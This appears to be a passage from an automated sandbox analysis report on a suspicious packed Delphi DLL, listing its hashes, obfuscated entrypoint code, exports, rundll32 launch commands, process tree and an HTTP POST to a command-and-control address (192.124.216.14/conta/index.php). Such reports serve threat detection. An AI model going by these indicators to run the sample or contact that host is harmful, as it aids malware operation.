      SSDEEP:192:hO0DXP8/XSIqePCO5H4e3/b6Wzw0ypnAR8C8V9H:ckkLrl5H3PbnzfypnAOv
      MD5:78A84F8C0BE93D3FD75AD05B2D88AC7E
      SHA1:34E75D6D8DF026FE6B3CAB083E6D5C0409056D38
      SHA-256:1F95C418D392FC53E9C37FBA35B8C98FF7041069F0C72B729ED2A49F244AE54D
      SHA-512:F942A6E813566C76E706DDF02FD5AD9AA84D6D0A83396D7339F42DD40DFA17DED1B3A2FDE467A18B7F2E3672546B9FBDF1EE804EBB532B19F2EEA8AE59575890
      Malicious:false
      Preview:MDMP..a..... .......D.Wg.........................................1..........T.......8...........T......................................|...............................................................................eJ....... ......GenuineIntel............T.......4...*.Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER91B0.tmp.WERInternalMetadata.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8362
      Entropy (8bit):3.695605645850704
      Encrypted:false
      SSDEEP:192:R6l7wVeJdL6CX96Y6q61gmf84eprG89brMwfsfRxqm:R6lXJB6Q96Yf61gmf84krMwEfXb
      MD5:99F8EEFEEEC535CCE6743A9057873C8A
      SHA1:A147572FCCAC33A3AE9B2FC1C19EE804824F6D4B
      SHA-256:79FDBE5C21A68ECEF1E56DA1C2D9E452E4A001C4E808386081CBA4E7382030F3
      SHA-512:CA0E39E484D2D7B748BBAD3135CDD99E21258073FD40DC4D2EBCD768637B25C5E7614B3590137417A5CB28D697DC02CA6A9D9CE7527CF43DCB17F18AE8FFAE68
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.9.6.<./.P.i.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER920F.tmp.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4751
      Entropy (8bit):4.457664535090105
      Encrypted:false
      SSDEEP:48:cvIwWl8zslJg77aI9SNWpW8VYGYm8M4JCdPKZFbZ+q8vjPKqGScSvd:uIjf/I7k87VCJhxKmqJ3vd
      MD5:2D247FE5E2CE234D31B604FC05D417A4
      SHA1:4A2E3C993D53C6370585F5710B2930222D2ECAAD
      SHA-256:E6C36B8627E09315B3AA1351BE605895505740288A7E2CE6FC30B6DA151635E6
      SHA-512:E1EFF2110DE8666C5B60AA9244C7E6C895F61D55F57AFFFF30F640E14019B565B716BE10320A9787780DEA40001B33695A5F0C3C390027917336DE6210BDBC10
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624809" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA508.tmp.dmp

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:27:21 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):46440
      Entropy (8bit):2.047470621180156
      Encrypted:false
      SSDEEP:192:gocXf8/X2IaQtZO5H4e30JlmJMzQVthtYOYnU8:M0XaQC5H3KlwMzQncO2
      MD5:BCBDB91A070B255959FB8AE04750851C
      SHA1:97F7F4BED1507A460492DA8F7E5B5148A0951D61
      SHA-256:988D0E6992E1FBD7C332FFCB582F34173F9B8FA5B59190C9D9F8830B7518E10E
      SHA-512:4F1AD604F5195340B39EB2073F64495D97ADEA02B7F76162F813296B50562D088811EAF0F3EB67D7CEC25191D5050860320C3386120D8E73BC125FECB88CEB09
      Malicious:false
      Preview:MDMP..a..... .......I.Wg.........................................1..........T.......8...........T.......................................|...............................................................................eJ....... ......GenuineIntel............T.......\...*.Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA613.tmp.WERInternalMetadata.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8298
      Entropy (8bit):3.6971705705393036
      Encrypted:false
      SSDEEP:192:R6l7wVeJo66bg6Y6P61gmfT4eprM89brgssfTGxGm:R6lXJ96M6Ya61gmfT4yrg/fT0v
      MD5:818C0AA87E5213FA5D2882A7CF6B8A25
      SHA1:3BFE059D5E57B7F2911721CC0D024A878359E134
      SHA-256:DD10B714EDEB8EFF05F99CA205E1F6026EAFC010DE704B90FE445E50A0916D89
      SHA-512:AE55938B63D08D1AE11D7A2490346547CC69FD87CB903F9F359EBAD7F0E6AB7E07A2176950F7F87AC04EF62CCE2BE24F639660653FD4DB83D6F561F13D05330C
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.8.<./.P.i.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA662.tmp.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4650
      Entropy (8bit):4.471359943734847
      Encrypted:false
      SSDEEP:48:cvIwWl8zs3Jg77aI9SNWpW8VYiYm8M4JCdPzFWSdm+q8/7ZGScSNad:uIjfZI7k87VGJ7SAIJ3Nad
      MD5:7005C33BA6A8AC47BFB54B9ACD33088F
      SHA1:2352AA8422330FD1940B9762BD32997184B7D226
      SHA-256:59725CDC46442A90FFCE3591A915A6ED67CDA71889B5D3A150FF859F5CA48552
      SHA-512:FBDE9A83D307983A2B65B0D442D55ABA7DA6BECBA1AB3C63B64DBBB44B9B964157A6CC3134D3E908C7C6E47CA8850C35529645657CA7A51E29B39A6F24AE1D70
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624810" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

      C:\Windows\appcompat\Programs\Amcache.hve

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.29613346853373
      Encrypted:false
      SSDEEP:6144:n41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+vwmBMZJh1Vj/:41/YCW2AoQ0NipwwMHrVT
      MD5:FFB1ABE7BE8E8D0E51F5271E38BEB07D
      SHA1:1B26FBD0DF3396C82C0364A50D13DD18A08B76E7
      SHA-256:F2982E5FF426302B516F7B9ADEA897CD47F387CAAF6E3839376697C5C45427A3
      SHA-512:23F763F53EB15D80CF3AE22F06064FF33DF3B7FE43F31D19F908EF73C2AC23A124426A08FC413AED89E9D6998124126F8F2444544BF846492E25D24F7B2AD216
      Malicious:false
      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...~.J................................................................................................................................................................................................................................................................................................................................................J........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Entropy (8bit):7.972921603246253
      TrID:
      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
      • Generic Win/DOS Executable (2004/3) 0.20%
      • DOS Executable Generic (2002/1) 0.20%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Y7KU3yvGQ6.dll
      File size:17'234'944 bytes
      MD5:ed7c5857a2a61a69f73ca5f01c0f1c8c
      SHA1:ac4c87194f5b5b731c616bcc9873f8397796e686
      SHA256:b3243d65c7b8bea56f75411c660afbc43e701b4cd453b47e61fb5a797a2e6c18
      SHA512:6dcb6580e388d3e33c835e778dad82472dbeecfd4e4cfb093ef4da9561de12131c7217bc2618d040946563d2738de098f16090ccc61d9d09bd29050b934fe733
      SSDEEP:393216:uwARThTHHFaR5gKCpzOXO/W5GGWVq/mBaW9PRtXmbbZ:fARlT8XCAXO/WMfc/mD7mbF
      TLSH:1507339A7DDB4091E4C108F4DB1B7BDB23F2961A4AC708397DC539C630E1FA6622B947
      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

      File Icon

      Icon Hash:7ae282899bbab082

      Static PE Info

      General

      Entrypoint:0x34b66f4
      Entrypoint Section:.:!0
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x675705E5 [Mon Dec 9 14:59:49 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:0
      File Version Major:5
      File Version Minor:0
      Subsystem Version Major:5
      Subsystem Version Minor:0
      Import Hash:66e4b3441c1028ee7f0c98948771803c

      Entrypoint Preview

      Instruction
      call 00007F9A3CD9C79Eh
      inc ecx
      mov ebx, A2164D22h
      dec ecx
      bswap ebx
      dec ecx
      sub esp, 00000004h
      inc ecx
      mov esi, dword ptr [esp]
      dec ecx
      sar ebx, 17h
      inc ebp
      mov edi, ebx
      dec edi
      lea ebx, dword ptr [ebx+edi*8+7A37760Fh]
      inc ecx
      xor esi, edx
      inc bp
      btc ebx, ebx
      dec ecx
      bts ebx, FFFFFFA2h
      inc bp
      btc ebx, edi
      rol esi, 1
      inc edx
      lea esi, dword ptr [esi+edi-68298774h]
      inc ecx
      movsx edi, di
      inc ebp
      movzx ecx, di
      dec ebp
      lea eax, dword ptr [edi+4F0A48B6h]
      xor esi, 36877B93h
      dec ebx
      lea eax, dword ptr [ecx+ecx+428CDF20h]
      inc ebp
      movsx esi, ax
      inc esi
      inc ecx
      push edx
      cdq
      inc ecx
      movzx ebx, al
      inc ecx
      xor bl, bl
      xor dword ptr [esp+edi*2-00008800h], esi
      inc ecx
      pop edx
      dec edx
      lea ecx, dword ptr [edi+esi*8-5A6073D1h]
      dec eax
      arpl si, si
      dec esp
      add ebp, esi
      cwd
      jmp 00007F9A3CCD7DDEh
      mov edi, 2BA81C05h
      jmp 00007F9A3CE4FAF7h
      xor ecx, ebx
      bswap ecx
      shl dx, 006Ah
      sal dl, FFFFFF87h
      dec ecx
      ror ecx, 02h
      inc ecx
      sal ax, 004Fh
      lea edx, dword ptr [edx+edx*2-6EF0BE74h]
      cmovnb eax, edx
      xor ebx, ecx
      add edi, ecx
      cwde
      sar edx, 77h
      mov edx, dword ptr [ebp+edx*2-0000017Dh]
      add al, al

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x24343540xe2.:!0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x2fe5bd80x230.:!0
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x32d10000x4f8.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x22610000xf0.#>*
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x30521e40x1c0.:!0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x30a2040x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .itext0x30c0000x24d40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .data0x30f0000x102800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .bss0x3200000x6fbc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .idata0x3270000x3d520x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .didata0x32b0000xa9a0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .edata0x32c0000xe20x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .rdata0x32d0000x440x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .R6V0x32e0000x1f322300x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .#>*0x22610000xcc00xe00cb6a4370d0f0ca6913354c77f94c88a7False0.050502232142857144data0.41212055563753786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .:!00x22620000x106e2600x106e4000a60ebea294551d19f091c7380ab69a1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .reloc0x32d10000x4f80x600e7ea81a6b93ce920adeaa4dea3e31913False0.4427083333333333data3.9922583785129406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

      Imports

      DLLImport
      oleaut32.dllSysFreeString
      advapi32.dllRegQueryValueExW
      user32.dllCharNextW
      kernel32.dllGetVersion
      kernel32.dllGetProcAddress
      user32.dllSetClassLongW
      gdi32.dllUnrealizeObject
      version.dllVerQueryValueW
      kernel32.dllGetVersionExW, GetVersion
      advapi32.dllRegUnLoadKeyW
      kernel32.dllSleep
      netapi32.dllNetApiBufferFree
      oleaut32.dllSafeArrayPtrOfIndex
      oleaut32.dllGetErrorInfo
      ole32.dllOleUninitialize
      shell32.dllShell_NotifyIconW
      comctl32.dllInitializeFlatSB
      user32.dllEnumDisplayMonitors
      msvcrt.dllmemset
      shell32.dllSHGetFolderPathW
      winspool.drvOpenPrinterW
      winspool.drvGetDefaultPrinterW
      wsock32.dllWSACleanup
      Magnification.dllMagSetImageScalingCallback
      kernel32.dllGetConsoleWindow
      kernel32.dllGetSystemTimeAsFileTime
      kernel32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

      Exports

      NameOrdinalAddress
      GetInstallDetailsPayload50x700c98
      SignalInitializeCrashReporting40x700c9c
      TMethodImplementationIntercept30x4643b0
      __dbk_fcall_wrapper20x410bb4
      dbkFCallWrapperAddr10x723634

      Network Behavior

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Dec 10, 2024 07:26:50.070617914 CET4974680192.168.2.10192.124.216.14
      Dec 10, 2024 07:26:50.190023899 CET8049746192.124.216.14192.168.2.10
      Dec 10, 2024 07:26:50.190140009 CET4974680192.168.2.10192.124.216.14
      Dec 10, 2024 07:26:50.190380096 CET4974680192.168.2.10192.124.216.14
      Dec 10, 2024 07:26:50.309614897 CET8049746192.124.216.14192.168.2.10
      Dec 10, 2024 07:26:51.667148113 CET8049746192.124.216.14192.168.2.10
      Dec 10, 2024 07:26:51.667714119 CET4974680192.168.2.10192.124.216.14
      Dec 10, 2024 07:26:51.787439108 CET8049746192.124.216.14192.168.2.10
      Dec 10, 2024 07:26:51.787506104 CET4974680192.168.2.10192.124.216.14

      HTTP Request Dependency Graph

      • 192.124.216.14

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.1049746192.124.216.14805988C:\Windows\SysWOW64\rundll32.exe
      TimestampBytes transferredDirectionData
      Dec 10, 2024 07:26:50.190380096 CET236OUTPOST /conta/index.php HTTP/1.0
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 0
      Host: 192.124.216.14
      Accept: text/html, */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
      Dec 10, 2024 07:26:51.667148113 CET203INHTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 06:26:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8


      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\System32\loaddll32.exe
      Wow64 process (32bit):true
      Commandline:loaddll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll"
      Imagebase:0xdd0000
      File size:126'464 bytes
      MD5 hash:51E6071F9CBA48E79F10C84515AAE618
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      General

      Target ID:1
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff620390000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:2
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
      Imagebase:0xd70000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:3
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      General

      Target ID:4
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      General

      Target ID:6
      Start time:01:26:29
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:false

      General

      Target ID:7
      Start time:01:26:32
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      General

      Target ID:11
      Start time:01:26:48
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:12
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      General

      Target ID:13
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      General

      Target ID:14
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Has exited:true

      General

      Target ID:15
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Has exited:true

      General

      Target ID:16
      Start time:01:26:51
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Has exited:true

      General

      Target ID:19
      Start time:01:26:55
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 768
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:21
      Start time:01:27:15
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 768
      Imagebase:0x1d0000
      File size:483'680 bytes
